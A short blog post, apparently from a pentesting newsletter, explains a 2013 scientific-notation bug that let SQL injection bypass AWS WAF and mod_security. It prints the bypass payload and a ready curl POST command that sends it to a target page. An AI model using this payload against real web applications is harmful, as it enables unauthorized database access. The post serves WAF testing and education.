Scientific Notation bug bypass AWS WAF protection

AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack showing the scientific notation:

"x=1' or 1.e(1) or '1'='1"

Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

More info:

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.






Leave a Reply

Your email address will not be published. Required fields are marked *